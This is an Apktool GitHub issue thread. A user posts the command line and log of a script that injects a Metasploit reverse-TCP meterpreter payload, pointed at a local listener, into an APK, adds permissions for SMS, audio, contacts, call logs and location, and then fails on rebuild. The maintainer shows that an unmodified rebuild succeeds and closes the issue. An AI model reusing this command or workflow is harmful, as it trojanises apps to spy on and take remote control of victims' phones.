### ISSUE TITLE
i was trying to embed a payload in an apk , i did it both manually and also by using a apk-embed-payload.rb script but i get the same error 

### ISSUE THREAD

**Issue by Treeco** [iBotPeaches/Apktool#1391]
### Information
1. **Apktool Version (`apktool -version`)** 2.2.1-dirty
2. **Operating System (Mac, Linux, Windows)** - kali linux rolling
3. **APK From? (Playstore, ROM, Other)** - other 

### Stacktrace/Logcat

./run wifimgr.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1377

██╗  ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗
╚██╗██╔╝██╔════╝██╔═████╗██╔══██╗╚════██╗██╔══██╗╚══███╔╝
 ╚███╔╝ ██║     ██║██╔██║██║  ██║ █████╔╝██████╔╝  ███╔╝ 
 ██╔██╗ ██║     ████╔╝██║██║  ██║ ╚═══██╗██╔══██╗ ███╔╝  
██╔╝ ██╗╚██████╗╚██████╔╝██████╔╝██████╔╝██║  ██║███████╗
╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝                                  

Embed a Metasploit Payload in an Original .Apk File v0.2
[1] Generating msfvenom payload
[2] Signing payload
[3] Decomposing original APK
[4] Decomposing payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading Manager.smali and injecting payload
[+] Adding android.permission.ACCESS_COURSE_LOCATION
[+] Adding android.permission.ACCESS_FINE_LOCATION
[+] Adding android.permission.SEND_SMS
[+] Adding android.permission.RECEIVE_SMS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CALL_PHONE
[+] Adding android.permission.READ_CONTACTS
[+] Adding android.permission.WRITE_CONTACTS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.READ_SMS
[+] Adding android.permission.RECEIVE_BOOT_COMPLETED
[+] Adding android.permission.SET_WALLPAPER
[+] Adding android.permission.READ_CALL_LOG
[+] Adding android.permission.WRITE_CALL_LOG
[8] Rebuilding wifimgr.apk with metasploit payload
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 139): [/usr/bin/aapt, p, --min-sdk-version, 10, --target-sdk-version, 23, --version-code, 141, --version-name, 1.6.2.1, -F, /tmp/APKTOOL4251102126629682771.tmp, -0, assets/ofd/count, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/7NX39YJ/original/res, -M, /tmp/7NX39YJ/original/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:478)
	at brut.androlib.Androlib.buildResources(Androlib.java:412)
	at brut.androlib.Androlib.build(Androlib.java:311)
	at brut.androlib.Androlib.build(Androlib.java:264)
	at brut.apktool.Main.cmdBuild(Main.java:227)
	at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 139): [/usr/bin/aapt, p, --min-sdk-version, 10, --target-sdk-version, 23, --version-code, 141, --version-name, 1.6.2.1, -F, /tmp/APKTOOL4251102126629682771.tmp, -0, assets/ofd/count, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/7NX39YJ/original/res, -M, /tmp/7NX39YJ/original/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:439)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:464)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 139): [/usr/bin/aapt, p, --min-sdk-version, 10, --target-sdk-version, 23, --version-code, 141, --version-name, 1.6.2.1, -F, /tmp/APKTOOL4251102126629682771.tmp, -0, assets/ofd/count, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/7NX39YJ/original/res, -M, /tmp/7NX39YJ/original/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:433)
	... 6 more
[!] Upgrade apktool to the latest apktool.jar fixes the issue completely

Include stacktrace here
```

### Steps to Reproduce
1. `apktool `

### Frameworks
If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files
(`.apks` that live in `/system/framework` or `/system/priv-app`)

### APK
https://www.datafilehost.com/d/b16ac701

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything?--- yes i did
2. If you are trying to install a modified apk, did you resign it?--yes
3. Are you using the latest apktool version?--yes

**Comment by iBotPeaches** [comment]
```
➜  Bug1391 apktool d wifimgr.apk 
I: Using Apktool 2.2.2-31d015-SNAPSHOT on wifimgr.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /Users/connortumbleson/Library/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
➜  Bug1391 apktool b wifimgr
I: Using Apktool 2.2.2-31d015-SNAPSHOT
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: warning: string 'need_read_phone_state_permisssion' has no default translation.
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
➜  Bug1391 
```

So using the application by itself, there are no errors decoding and rebuilding. This leaves that whatever this automatic payload injector is doing is not right. Closing this as it appears to be support related and not a true bug in apktool.
